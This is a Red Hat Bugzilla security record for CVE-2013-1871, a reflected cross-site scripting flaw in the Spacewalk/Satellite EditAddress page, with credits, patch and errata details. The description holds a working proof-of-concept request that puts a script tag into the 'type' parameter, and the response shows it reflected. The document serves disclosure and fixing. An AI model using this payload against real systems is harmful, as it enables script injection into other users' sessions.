Bug 923467 (CVE-2013-1871) - CVE-2013-1871 Satellite/Spacewalk: XSS in EditAddress page
Summary: CVE-2013-1871 Satellite/Spacewalk: XSS in EditAddress page
Keywords:
Status: CLOSED ERRATA
Alias: CVE-2013-1871
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
medium
medium
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact: Dimitar Yordanov
URL:
Whiteboard:
Depends On: 915467
Blocks: 915998 1011743
TreeView+ depends on / blocked
 
Reported: 2013-03-19 23:04 UTC by Vincent Danen
Modified: 2019-09-29 13:01 UTC (History)
9 users (show)

Fixed In Version: spacewalk-java-2.0.2-57-sat
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2014-02-11 13:09:00 UTC


Attachments (Terms of Use)
Patch fixes XSS issue (1.57 KB, patch)
2013-11-05 20:13 UTC, Grant Gainey
no flags Details | Diff


Links
System ID Priority Status Summary Last Updated
Red Hat Product Errata RHSA-2014:0148 normal SHIPPED_LIVE Moderate: spacewalk-java, spacewalk-web and satellite-branding security update 2014-02-10 22:29:32 UTC

Description Vincent Danen 2013-03-19 23:04:34 UTC
Ryan Giobbi from UPMC reported an XSS flaw in the EditAddress.do page:

Request

GET /rhn/account/EditAddress.do?type=M83ab7<script>alert(1)</script>c47ea873a9d&uid=41 HTTP/1.1
Host: host.example.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 21 Feb 2013 18:24:04 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: pxt-session-cookie=7053xcace9e6d1158735e6f047ab49e4e509c; Path=/; Secure; HttpOnly
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="e
...[SNIP]...
<h2>
**address type M83ab7<script>alert(1)</script>c47ea873a9d**
Record:
</h2>
...[SNIP]...

Comment 1 Vincent Danen 2013-03-19 23:04:59 UTC
Acknowledgements:

Red Hat would like to thank Ryan Giobbi of UPMC for reporting this issue.

Comment 2 Grant Gainey 2013-11-05 20:13:37 UTC
Created attachment 820005 [details]
Patch fixes XSS issue

Fix the reported issue

Comment 3 Grant Gainey 2014-01-24 15:42:51 UTC
commit 07a7bd38b492cf2d77e1223ae3acfac75244254e

Comment 5 errata-xmlrpc 2014-02-10 17:33:21 UTC
This issue has been addressed in following products:

  Red Hat Satellite Server v 5.6

Via RHSA-2014:0148 https://rhn.redhat.com/errata/RHSA-2014-0148.html


Note You need to log in before you can comment on or make changes to this bug.